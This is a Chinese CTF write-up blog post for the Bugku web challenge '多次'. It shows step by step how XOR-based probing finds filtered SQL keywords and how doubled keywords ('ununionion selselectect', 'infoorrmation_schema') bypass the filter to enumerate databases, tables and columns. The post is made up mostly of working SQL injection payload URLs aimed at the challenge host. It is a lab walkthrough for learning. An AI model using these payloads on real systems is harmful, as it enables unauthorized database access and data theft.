bugku-Web-多次(异或注入,判断被过滤的关键字)

版权声明:本文为博主原创文章,转载需注明出处。 https://blog.csdn.net/zz_Caleb/article/details/84981064

进去看到url感觉是sql注入,

加上',报错但是%23不报错,加上'--+,也不报错,说明可以用--+注释
加上' or 1=1--+,报错
尝试' oorr 1=1--+,正常
说明or被过滤了.

那么怎么判断哪些关键字被过滤了呢,这里用到异或注入(同真异假)。

http://120.24.86.145:9004/1ndex.php?id=1'^(length('union')!=0)--+

如果返回正常说明union被过滤了。

这样尝试出来被过滤的关键字:union、select、and、or、(order、information中含or)

由最上面知道双写可以绕过过滤
 

猜字段数
http://123.206.87.240:9004/1ndex.php?id=1' oorrder by 2 --+ 正常
http://123.206.87.240:9004/1ndex.php?id=1' oorrder by 3 --+ 报错
暴库:
id=-1' ununionion selselectect 1,batabase()--+

web1002-1
暴表:123.206.87.240:9004/1ndex.php?id=-1' ununionion selselectect 1,group_concat(table_name) from infoorrmation_schema.tables where table_schema='web1002-1'--+

flag1
爆列名:
123.206.87.240:9004/1ndex.php?id=-1' ununionion selselectect 1,group_concat(column_name) from infoorrmation_schema.columns where table_name='flag1'--+


flag1,address

下一阶段如果爆出flag1,会出来一串字符

尝试爆出address的话出现下一关地址,进入下一关

猜你喜欢

转载自blog.csdn.net/zz_Caleb/article/details/84981064
今日推荐